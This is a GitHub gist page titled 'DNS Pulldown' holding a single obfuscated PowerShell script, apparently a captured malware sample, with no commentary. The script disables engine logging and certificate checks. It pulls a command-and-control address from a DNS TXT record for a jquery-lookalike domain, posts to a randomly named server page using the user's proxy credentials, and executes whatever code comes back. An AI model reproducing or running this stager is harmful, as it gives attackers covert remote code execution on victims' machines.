Created
August 26, 2020 18:51
-
-
Save JohnHammond/d7bab148962e0d61be3d68772e6662c8 to your computer and use it in GitHub Desktop.
DNS Pulldown
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0..4|%{try | |
{ | |
$LogEngineLifeCycleEvent=$LogEngineHealthEvent=$LogProviderLifecycleEvent=$LogProviderHealthEvent=$False; | |
$u=[System.Text.Encoding]::UTF8; | |
sAl er Get-Random; | |
$l=[System.Net.WebRequest]; | |
sAL no New-Object; | |
$g=[SysTEm.Net.SeRvICePoIntMAnaGEr]; | |
$g::Expect100ConTINuE=0; | |
$g::ServerCertificateValidationCallback={1}; | |
$j={$t=$args; [string](0..$t[0]|%{[char][int]([int][char]('&')+($t[1]).substring(($_*$t[2]),$t[2]))})-replace' '}; | |
$b= $u.GetBytes('ssd'); | |
if($PSVersionTable.PSVersion.Major -gt 4){$g::SecurityProtocol="$(. $j 14 '7870771112 67870771111 6787077' 2)"; | |
$c=$(. $j 7 '667878747720 9 9' 2)+$($t={$u.GetString([System.Convert]::FromBase64String($args[0]))}; | |
# https://dns.google.com/resolve?name=dmarc.jqueryupdatejs.com&type=Txt | |
(nO System.Net.Webclient).DownloadString($(& $j 68 '667878747720 9 9627277 8657373657063 8617371 9766377737080632572597163236271597661 86875796376837974625978636877 8617371 07883746323468278' 2))|%{($_[$_.IndexOf([char](47))..$_.IndexOf([char](43))]-join'').split([char](47))[($(3,5)|Er)]+$(-join(0..1|%{[char](61)}))}|%{(. $t $_)}|%{(. $t $_)})+[char](47)+$(-join(1..$(@(8,6,7)|ER)|%{[char][int]((65..90)+(97..122)|ER)})).ToLower()+[char](46)+$(@('php','jsp','asp')|ER)}else{$c="$(. $j 17 '667878747720 9 911141814121318161713' 2)"+[char](47)+$(-join(1..$(@(8,6,7)|eR)|%{[char][int]((65..90)+(97..122)|ER)})).ToLower()+[char](46)+$(@('php','jsp','asp')|ER)}; | |
[System.Net.HttpWebRequest] $w=$l::Create($c); | |
$w.Proxy=$l::GetSystemWebProxy(); | |
$w.Proxy.Credentials=[System.Net.CredentialCache]::DefaultCredentials; | |
$w.Timeout=60000; | |
$w.Method='POST'; | |
$w.ContentType=$(& $j 14 '5974747067615978677372 9827170' 2); | |
$w.ContentLength=$b.Length; | |
$r=$w.GetRequestStream(); | |
$r.Write($b, 0, $b.Length); | |
$r.Flush(); | |
$r.Close(); | |
[System.Net.HttpWebResponse] $wr=$w.GetResponse(); | |
$sr=NO System.IO.StreamReader($wr.GetResponseStream()); | |
[CHAr[]]$ri = ([cHAr[]]($sr.ReadToEnd())); | |
$wr.Close(); | |
Iex ($ri -JOIn''); | |
}catch {sleEP -s $(@(5,16,17)|ER); | |
$_.Exception.Message|oUt-NUll} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment